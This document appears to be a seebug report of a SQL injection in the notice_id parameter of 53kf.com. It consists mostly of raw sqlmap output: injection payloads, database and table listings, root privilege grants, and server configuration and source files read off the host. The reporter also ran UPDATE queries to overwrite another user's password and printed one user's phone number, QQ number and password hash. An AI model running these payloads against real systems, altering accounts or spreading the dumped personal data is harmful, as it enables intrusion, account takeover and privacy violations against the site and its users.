seebug | Root | SSV:94376
History: Oct 10, 2012 - 12:00 a.m.

Severe SQL injection vulnerability in 53kf.com

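Brief description:

A severe SQL injection vulnerability in 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; files cannot be written, but they can be read, so the source code can be read in full. Since I could not find the admin backend, I have not obtained a webshell for now. It will probably be rated 20 Rank whether or not I get a shell, so I did not bother.

Detailed description: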

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:

Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)

available databases [18]:
[*] 53kf_old
[*] 53kfcs
[*] en
[*] en1
[*] entalk
[*] information_schema
[*] ip
[*] ip5
[*] ip_bak
[*] ip_new
[*] mysql
[*] passport
[*] talk
[*] test
[*] ut
[*] v5
[*] v5110110
[*] v5_old

Database: 53kfcs
[14 tables]
+------------------+
| admin_oper |
| admin_oper_bill |
| cs_address |
| cs_adv |
| cs_category |
| cs_company |
| cs_company_bill |
| cs_fav |
| cs_index_product |
| cs_mail |
| cs_notice |
| cs_order |
| cs_product |
| cs_same_product |
+------------------+

Database: v5
[52 tables]
+---------------------+
| ad |
| ad_count |
| ad_show |
| ad_show_js |
| conf_ip1 |
| cps_commission_log |
| cps_user |
| cps_user_account |
| cps_user_logs |
| cps_withdrawing_log |
| daemonlog_recv |
| daemonlog_send |
| gggj_account |
| gggj_accountHistory |
| gggj_ad |
| gggj_ad_old |
| gggj_adstat |
| gggj_config |
| gggj_master_type |
| gggj_master_user |
| gggj_oper_log |
| gggj_require |
| gggj_solution |
| gggj_spread |
| gggj_stat |
| gggj_user |
| gggj_user_config |
| id_record |
| kf_tuo |
| kf_tuo_test |
| mailqueue |
| official_adstat |
| official_stat |
| out_links |
| out_links_message |
| pub_cps |
| sendemail_record |
| user_infor |
| user_infor_xx |
| v5_admin_group |
| v5_admin_oper |
| v5_agent_bill |
| v5_agent_oper |
| v5_cate |
| v5_company |
| v5_company_account |
| v5_company_bill |
| v5_company_config |
| v5_company_talk_log |
| v5_worker |
| web_ad_out_links |
| web_user_url |
+---------------------+

select count(*) from v5.cps_user: ‘1367’

select count(*) from v5.gggj_user: ‘225’

select count(*) from v5.v5_admin_oper: ‘3’

Database: ut
[85 tables]
+--------------------------+
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| announcement |
| autoreply |
| autoreply2 |
| block_user |
| chat_nation |
| chat_net |
| chat_place |
| chat_search |
| chat_worker |
| com_talk |
| com_talk_all_moved |
| com_talk_bak |
| com_talk_hnqyw |
| com_talk_online |
| company |
| company_config |
| company_config1 |
| company_style |
| company_talk |
| company_yiyuan |
| company_yiyuan2 |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| customer |
| customer2 |
| cyy |
| cyy_group |
| err_infos |
| face |
| file |
| imessage |
| jiulong_log |
| link |
| logsql |
| mail |
| mail_template |
| mailqueue |
| message |
| message2 |
| module |
| module2 |
| robot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sql_sync |
| stat |
| stat_from |
| stat_nation |
| stat_place |
| stat_search |
| stat_to |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_delete |
| talk_his_read |
| talk_id |
| talk_subject |
| talk_total |
| talk_vote |
| user |
| user2 |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| worker_talk |
+--------------------------+

select * from v5.v5_admin_oper [3]:

Database: talk
[80 tables]
+--------------------------+
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| announcement |
| area_kf |
| autoreply |
| block_user |
| chat_nation |
| chat_net |
| chat_place |
| chat_search |
| chat_worker |
| company |
| company_ad |
| company_config |
| company_etel |
| company_style |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| customer |
| cyy |
| cyy_group |
| err_infos |
| etel_logo |
| face |
| file |
| identity |
| imessage |
| jiulong_log |
| link |
| logo |
| logsql |
| mail_template |
| mailqueue |
| message |
| module |
| module_special |
| robot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sql_sync |
| stat |
| stat_from |
| stat_keyword_month |
| stat_nation |
| stat_place |
| stat_search |
| stat_to |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_delete |
| talk_his_read |
| talk_id |
| talk_subject |
| talk_total |
| talk_vote |
| v5_company_config |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| zsk_category |
| zsk_key |
| zsk_question |
+--------------------------+

current database: ‘v5’

select * from v5.cps_user where username=‘clzzy444’: None

Database: v5
Table: cps_user
[13 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| company_url | varchar(50) |
| contact_name | varchar(50) |
| cust_id | varchar(20) |
| id | int(20) |
| is_checked | tinyint(2) |
| is_verified | tinyint(2) |
| mobile | varchar(11) |
| pwd | varchar(50) |
| qq | varchar(11) |
| reg_num | int(10) |
| user_name | varchar(100) |
+-------------------+--------------+

select * from v5.cps_user where user_name=‘clzzy444’: None

select * from v5.cps_user where id=‘clzzy444’: None

select * from v5.cps_user where qq=‘235623654’ [1]:
[*] 0.00, 0.00, http://www.ggggww.com, ???, clzzy444, 28024, 1, 1, 15829002900, my81trWOM1JpY, 235623654, 0, [email protected]

select count(*) from v5.cps_user where balance>100: ‘7’

select count(*) from v5.cps_user where balance>1000: ‘0’

select count(*) from v5.cps_user where balance>500: ‘2’

select count(*) from v5.cps_user where cash_frozen_money>500: ‘0’

select count(*) from v5.cps_user where cash_frozen_money>100: ‘0’

select count(*) from v5.cps_user where cash_frozen_money>600: ‘0’

select count(*) from v5.cps_user where cash_frozen_money>550: ‘0’

select count(*) from v5.cps_user where balance>550: ‘2’

select count(*) from v5.cps_user where balance>650: ‘1’

select * from v5.cps_user where balance>550 [2]:

update v5.cps_user set pwd='my81trWOM1JpY ’ where user_name=‘[email protected]’: None

update v5.cps_user set pwd=‘my81trWOM1JpY’ where user_name=‘[email protected]’: None

update v5.cps_user set pwd=‘my81trWOM1JpY’ where user_name=‘[email protected]’: None

select * where user_name=‘[email protected]’: None

select pwd from v5.cps_user where user_name=‘[email protected]’ [1]:
[*] mynK8lOObPeyY

database management system users privileges:
[*] %% (administrator) [26]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
privilege: USAGE
[*] %root% (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE

/apache/logs/error.log file saved to: None

/etc/httpd/logs/acces_log file saved to: None

/etc/httpd/conf/httpd.conf file saved to: None

/usr/local/apache/conf/httpd.conf file saved to: None

/var/www/html/apache/conf/httpd.conf file saved to: None

/home/httpd/conf/httpd.conf file saved to: None

Database: v5
Table: cps_withdrawing_log
[14 columns]
+------------------------+------------------+
| Column | Type |
+------------------------+------------------+
| account_user | varchar(20) |
| audit_oper | varchar(20) |
| audit_remark | text |
| audit_time | datetime |
| cust_id | varchar(20) |
| id | int(20) |
| io_remark | text |
| money | float(10,2) |
| status | varchar(30) |
| withdrawing_account | varchar(50) |
| withdrawing_audit_oper | varchar(20) |
| withdrawing_remark | text |
| withdrawing_time | datetime |
| withdrawing_type | int(10) unsigned |
+------------------------+------------------+
Database: v5
Table: ad
[19 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| ad_area | varchar(150) |
| ad_content | varchar(255) |
| ad_flag | tinyint(1) |
| ad_type | varchar(2) |
| ad_url | varchar(100) |
| company_id | bigint(20) |
| exp_day | date |
| id | int(11) |
| lang | varchar(5) |
| money | float(10,2) |
| oem | varchar(20) |
| proxy | varchar(20) |
| remark | mediumtext |
| seller | varchar(20) |
| start_day | date |
| sys_flag | tinyint(1) |
| t_day | datetime |
| t_edit_day | date |
| vip_order | int(10) |
+------------+--------------+
Database: v5
Table: pub_cps
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| content | text |
| id | int(20) |
| pub_date | datetime |
| pub_type | varchar(20) |
| title | text |
| url | varchar(50) |
+----------+-------------+
Database: v5
Table: v5_company_account
[10 columns]
+--------------+------------------+
| Column | Type |
+--------------+------------------+
| active_money | float(7,2) |
| company_id | int(20) unsigned |
| fee_date | date |
| fee_money | int(10) |
| fee_total | int(10) |
| fix_money | float(7,2) |
| fz_money | float(7,2) |
| id | int(20) unsigned |
| money | float(7,2) |
| pre_total | int(20) |
+--------------+------------------+
Database: v5
Table: kf_tuo_test
[10 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| ad_id | int(10) |
| ad_type | varchar(10) |
| area | varchar(100) |
| arg | varchar(30) |
| come_date | datetime |
| come_ip | varchar(20) |
| come_url | varchar(250) |
| host | varchar(30) |
| id | int(10) |
| user_id | int(10) |
+-----------+--------------+
Database: v5
Table: v5_admin_group
[3 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| id | int(11) |
| name | varchar(50) |
| permission | text |
+------------+-------------+
Database: v5
Table: gggj_spread
[8 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| add_time | date |
| admin_audit | enum(‘Y’,‘N’) |
| end_time | date |
| id | int(10) |
| log | text |
| money | varchar(10) |
| wzz_audit | enum(‘Y’,‘N’) |
| wzz_name | varchar(10) |
+-------------+---------------+
Database: v5
Table: gggj_stat
[10 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_date | date |
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_price | float |
| Clearing | enum(‘Y’,‘N’,‘X’) |
| click | int(11) |
| disp | int(11) |
| domain_name | varchar(20) |
| end_time | timestamp |
| money_type | tinyint(2) |
+-------------+-------------------+
Database: v5
Table: v5_admin_oper
[11 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| email | varchar(50) |
| group_id | smallint(2) |
| id | int(10) unsigned |
| is_admin | tinyint(2) |
| name | varchar(128) |
| oper_name | varchar(20) |
| oper_pwd | varchar(50) |
| phone | varchar(15) |
| qq | varchar(12) |
| reg_date | datetime |
| type | varchar(100) |
+-----------+------------------+
Database: v5
Table: daemonlog_send
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| action | char(16) |
| sendid | char(20) |
| stat | text |
+--------+----------+
Database: v5
Table: daemonlog_recv
[3 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| action | char(16) |
| last_recvid | char(20) |
| stat | text |
+-------------+----------+
Database: v5
Table: v5_cate
[3 columns]
+--------+------------------+
| Column | Type |
+--------+------------------+
| id | int(20) unsigned |
| name | varchar(40) |
| pid | int(20) |
+--------+------------------+
Database: v5
Table: out_links_message
[4 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| id | int(10) |
| message | varchar(256) |
| time | datetime |
| user_name | varchar(25) |
+-----------+--------------+
Database: v5
Table: gggj_solution
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| add_date | datetime |
| add_user | int(10) |
| content | text |
| id | int(10) |
| title | varchar(50) |
+----------+-------------+
Database: v5
Table: official_stat
[9 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_date | date |
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_price | float |
| Clearing | enum(‘Y’,‘N’,‘X’) |
| click | int(11) |
| disp | int(11) |
| domain_name | varchar(20) |
| money_type | tinyint(2) |
+-------------+-------------------+
Database: v5
Table: gggj_oper_log
[5 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| id | int(11) |
| log | text |
| oper_time | datetime |
| type | varchar(10) |
| user_id | varchar(20) |
+-----------+-------------+
Database: v5
Table: cps_user_logs
[8 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| after_content | varchar(255) |
| before_content | varchar(255) |
| classname | varchar(30) |
| createtime | datetime |
| logs_id | int(11) |
| oper_name | varchar(30) |
| operating | varchar(30) |
| sqlstr | text |
+----------------+--------------+
Database: v5
Table: gggj_user
[7 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| accountCode | varchar(50) |
| add_time | date |
| domain_name | varchar(20) |
| gggj_type | varchar(10) |
| id | int(11) |
| industry | varchar(5) |
| remark | varchar(255) |
+-------------+--------------+
Database: v5
Table: v5_company
[51 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| add_time | datetime |
| address | varchar(255) |
| admin_flag | tinyint(1) |
| chat_num | int(10) |
| chat_num_last | int(10) |
| chat_num_last_total | int(10) |
| city | varchar(50) |
| comm_num | int(10) |
| company_id | int(10) unsigned |
| domain_name | varchar(20) |
| email | varchar(50) |
| fax | varchar(20) |
| free_click | int(10) |
| friend_links | int(10) |
| hot_num | int(10) |
| indus | varchar(50) |
| key_word | varchar(60) |
| kf_bind | tinyint(2) |
| kf_id | varchar(30) |
| kf_type | tinyint(3) |
| last_login | datetime |
| linkman | varchar(25) |
| logo | varchar(25) |
| method | tinyint(1) |
| method_nnet | tinyint(1) |
| name | varchar(255) |
| net_reg | tinyint(1) |
| notes | text |
| online | bigint(20) |
| order_flag | tinyint(1) |
| paim | float |
| phone | varchar(40) |
| province | varchar(50) |
| proxy | varchar(50) |
| qq | varchar(50) |
| real_proxy | varchar(50) |
| reg_from | varchar(4) |
| search | varchar(255) |
| sell_name | varchar(20) |
| sell_stat | tinyint(2) |
| short_name | varchar(255) |
| show_flag | tinyint(2) |
| t_date | float(10,2) |
| t_today | date |
| t_total | float(10,2) |
| talk_area | varchar(150) |
| talk_etime | tinyint(10) |
| talk_stime | tinyint(10) |
| talk_url | varchar(100) |
| url | varchar(50) |
| vip_order | int(11) |
+---------------------+------------------+
Database: v5
Table: v5_agent_bill
[8 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| agent_id | int(11) |
| balance | float(7,2) unsigned |
| id | int(10) unsigned |
| io_time | datetime |
| io_type | int(10) unsigned |
| money | float unsigned |
| orderid | varchar(20) |
| reason | text |
+----------+---------------------+
Database: v5
Table: v5_company_bill
[13 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| company_id | int(20) |
| date | datetime |
| id | int(20) unsigned |
| ip | varchar(50) |
| istalk | tinyint(1) |
| money | float(7,2) |
| old_comid | bigint(20) |
| orderid | varchar(20) |
| pay_way | varchar(20) |
| person_name | varchar(100) |
| remark | text |
| src | varchar(20) |
| type | tinyint(2) |
+-------------+------------------+
Database: v5
Table: gggj_ad
[15 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_code | text |
| ad_content | varchar(50) |
| ad_name | varchar(50) |
| ad_price | float |
| ad_url | text |
| add_time | datetime |
| audit | enum('Y','N','X') |
| commits | varchar(10) |
| end_time | date |
| id | int(11) |
| master_name | varchar(20) |
| money_type | tinyint(2) |
| order_by | varchar(5) |
| show_type | varchar(1) |
| start_time | date |
+-------------+-------------------+
Database: v5
Table: web_user_url
[8 columns]
+---------------------+--------------+
| Column | Type |
+---------------------+--------------+
| baidu_date | date |
| baidu_record | varchar(20) |
| id | int(10) |
| is_first | tinyint(3) |
| pr | tinyint(2) |
| url | varchar(256) |
| user_name | varchar(20) |
| web_ad_out_links_id | int(10) |
+---------------------+--------------+
Database: v5
Table: ad_count
[6 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| ad_date | date |
| ad_id | int(11) |
| ad_ip_num | int(10) |
| ad_num | int(10) |
| ad_type | varchar(50) |
| id | int(11) |
+-----------+-------------+
Database: v5
Table: v5_worker
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| company_id | int(11) |
| id | int(11) |
| is_admin | tinyint(4) |
| name | varchar(100) |
| passwd | varchar(40) |
| worker_id | varchar(20) |
+------------+--------------+
Database: v5
Table: gggj_ad_old
[13 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_code | text |
| ad_content | varchar(50) |
| ad_name | varchar(50) |
| ad_price | float |
| ad_url | text |
| add_time | date |
| audit | enum('Y','N','X') |
| commits | varchar(10) |
| end_time | date |
| id | int(11) |
| master_name | varchar(11) |
| money_type | tinyint(2) |
| start_time | date |
+-------------+-------------------+
Database: v5
Table: v5_agent_oper
[30 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| active_money | float(10,2) |
| addr | varchar(150) |
| city | varchar(20) |
| city_center | tinyint(3) unsigned |
| city_discount | float unsigned |
| city_name | varchar(30) |
| discount | float unsigned |
| email | varchar(100) |
| fix_money | float(10,2) |
| id | int(10) unsigned |
| is_zongdai | tinyint(3) unsigned |
| kf_name | int(8) |
| money | float(10,2) |
| msg | tinyint(3) unsigned |
| name | varchar(50) |
| new_add_money | float(10,2) |
| new_add_month | varchar(7) |
| oper_name | varchar(20) |
| oper_pwd | varchar(50) |
| pass | tinyint(3) unsigned |
| phone | varchar(50) |
| receipt_money | float(10,2) |
| reg_date | datetime |
| see_agent_user | tinyint(3) |
| style_lock | tinyint(3) unsigned |
| tm | varchar(50) |
| type | tinyint(3) unsigned |
| zdygg | tinyint(3) unsigned |
| zdylogo | tinyint(3) unsigned |
| zongdai_id | int(10) unsigned |
+----------------+---------------------+
Database: v5
Table: gggj_adstat
[6 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_time | datetime |
| com_area | varchar(100) |
| com_ip | varchar(20) |
| domain_name | varchar(20) |
+-------------+--------------+
Database: v5
Table: v5_company_talk_log
[5 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| company_id | int(10) |
| id | int(10) |
| talk_date | datetime |
| talk_ip | varchar(15) |
| talk_url | varchar(100) |
+------------+--------------+
Database: v5
Table: gggj_accountHistory
[6 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| account | varchar(40) |
| add_person | varchar(11) |
| add_time | datetime |
| domain_name | varchar(50) |
| id | int(11) |
| moneNum | char(10) |
+-------------+-------------+
Database: v5
Table: gggj_account
[8 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| account | varchar(50) |
| account_from | varchar(20) |
| account_person | varchar(11) |
| account_type | char(10) |
| add_time | datetime |
| domain_name | varchar(50) |
| id | int(11) |
| is_select | enum('Y','N') |
+----------------+---------------+
Database: v5
Table: out_links
[7 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| ad_user | varchar(25) |
| add_time | datetime |
| anchor_text | varchar(128) |
| id | int(10) |
| pr | tinyint(2) |
| web_type | enum('0','1') |
| web_url | varchar(50) |
+-------------+---------------+
Database: v5
Table: user_infor
[17 columns]
+--------------+------------------+
| Column | Type |
+--------------+------------------+
| baidu_date | date |
| baidu_record | varchar(20) |
| com_name | varchar(128) |
| connect | varchar(40) |
| email | varchar(50) |
| gm_sum | int(10) |
| id | int(20) unsigned |
| money | int(10) |
| password | varchar(50) |
| phone | varchar(20) |
| pr | tinyint(2) |
| qq | varchar(20) |
| reg_sum | int(10) |
| type | varchar(2) |
| user_level | tinyint(2) |
| user_name | varchar(20) |
| website | varchar(50) |
+--------------+------------------+
Database: v5
Table: cps_commission_log
[8 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| add_time | datetime |
| company_id | int(10) unsigned |
| cps_account | varchar(20) |
| domain_name | varchar(20) |
| id | int(20) |
| money | decimal(10,2) |
| recharge_money | decimal(10,2) |
| remark | varchar(150) |
+----------------+------------------+
Database: v5
Table: user_infor_xx
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| add_date | datetime |
| id | int(20) |
| user_id | int(20) |
| xx_name | varchar(20) |
+----------+-------------+
Database: v5
Table: ad_show
[4 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| ad_dbgg | int(20) |
| ad_logo | int(20) |
| ad_time | date |
| id | int(20) |
+---------+---------+
Database: v5
Table: web_ad_out_links
[11 columns]
+-----------------+-------------------+
| Column | Type |
+-----------------+-------------------+
| add_time | datetime |
| delete_by | enum('2','1','0') |
| delete_time | datetime |
| end_time | datetime |
| id | int(10) |
| money_clearing | datetime |
| out_links_id | varchar(10) |
| start_time | datetime |
| status | enum('0','1','2') |
| web_user | varchar(25) |
| web_user_url_id | int(10) |
+-----------------+-------------------+
Database: v5
Table: sendemail_record
[10 columns]
+----------+------------------------------+
| Column | Type |
+----------+------------------------------+
| addtime | int(11) |
| content | varchar(225) |
| endtime | int(11) |
| mail_id | int(11) |
| receiver | varchar(225) |
| report | text |
| sendtime | int(11) |
| status | enum('wait','sending','end') |
| title | varchar(225) |
| type | enum('1','2','3') |
+----------+------------------------------+
Database: v5
Table: mailqueue
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| charset | char(4) |
| content | mediumtext |
| from1 | varchar(100) |
| fromname | varchar(255) |
| id | int(11) |
| reply | varchar(100) |
| status | tinyint(4) |
| subject | varchar(255) |
| to1 | varchar(255) |
+----------+--------------+
Database: v5
Table: gggj_master_user
[13 columns]
+----------+---------------+
| Column | Type |
+----------+---------------+
| com_name | varchar(100) |
| gg_type | varchar(20) |
| id | int(50) |
| is_proxy | enum('N','Y') |
| mail | varchar(20) |
| mobile | varchar(20) |
| name | varchar(10) |
| pass | char(50) |
| person | varchar(20) |
| phone | varchar(20) |
| remark | text |
| type | char(10) |
| url | varchar(100) |
+----------+---------------+
Database: v5
Table: gggj_config
[3 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| config_id | varchar(20) |
| config_value | text |
| domain_name | varchar(50) |
+--------------+-------------+
Database: v5
Table: id_record
[3 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| id | int(20) |
| last_date | datetime |
| last_id | int(10) |
+-----------+----------+
Database: v5
Table: v5_company_config
[3 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| company_id | int(11) |
| config_id | varchar(20) |
| config_value | text |
+--------------+-------------+
Database: v5
Table: conf_ip1
[6 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| area | char(30) |
| city | char(30) |
| city_cn | char(30) |
| end_ip | bigint(20) unsigned |
| isp | char(30) |
| start_ip | bigint(20) unsigned |
+----------+---------------------+
Database: v5
Table: gggj_require
[10 columns]
+--------------+---------------+
| Column | Type |
+--------------+---------------+
| add_date | datetime |
| add_fujian | varchar(255) |
| add_solution | text |
| add_user | int(10) |
| audit | enum('Y','N') |
| audit_day | datetime |
| content | text |
| id | int(10) |
| master_name | varchar(25) |
| title | varchar(50) |
+--------------+---------------+
Database: v5
Table: official_adstat
[6 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_time | datetime |
| com_area | varchar(100) |
| com_ip | varchar(20) |
| domain_name | varchar(20) |
+-------------+--------------+
Database: v5
Table: kf_tuo
[8 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| ad_id | int(10) |
| ad_type | varchar(10) |
| area | varchar(100) |
| come_date | datetime |
| come_ip | varchar(20) |
| come_url | varchar(250) |
| id | int(10) |
| user_id | int(10) |
+-----------+--------------+
Database: v5
Table: ad_show_js
[4 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| ad_dbgg | int(20) |
| ad_logo | int(20) |
| ad_time | date |
| id | int(20) |
+---------+---------+
Database: v5
Table: cps_user
[13 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| company_url | varchar(50) |
| contact_name | varchar(50) |
| cust_id | varchar(20) |
| id | int(20) |
| is_checked | tinyint(2) |
| is_verified | tinyint(2) |
| mobile | varchar(11) |
| pwd | varchar(50) |
| qq | varchar(11) |
| reg_num | int(10) |
| user_name | varchar(100) |
+-------------------+--------------+
Database: v5
Table: cps_user_account
[9 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| add_time | datetime |
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| cust_id | varchar(20) |
| exact_io_type | int(10) unsigned |
| id | int(20) |
| io_remark | text |
| io_type | tinyint(2) |
| money | float(10,2) |
+-------------------+------------------+
Database: v5
Table: gggj_user_config
[4 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| ad_id | int(11) |
| ad_order | int(4) |
| ad_pos | int(2) |
| domain_name | varchar(50) |
+-------------+-------------+
Database: v5
Table: gggj_master_type
[2 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| gg_type | varchar(10) |
| id | int(10) |
+---------+-------------+
/etc/rc.local file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files_etc_rc.local'
/usr/local/apache2/conf/httpd.conf file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files_usr_local_apache2_conf_httpd.conf'
/home/adv/www/cps/www/union_notice.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files_home_adv_www_cps_www_union_notice.php'
/home/adv/www/cps/www/include/global.php--threads=10 file saved to: None
/home/adv/www/cps/www/include/global.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files_home_adv_www_cps_www_include_global.php'
/home/adv/www/index.php file saved to: 'C:\Python27\sqlmap\output\cps.53kf.com\files_home_adv_www_index.php'
/home/adv/www/cps/www/config/cps_config.php file saved to: None

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201209/29184704653190bd59723b08398c08db947e4c7d.png" alt width="600">

<img src="https://images.seebug.org/upload/201209/29184717050a3199e90a5f4ecd0ab4c5e961d952.png" alt width="600">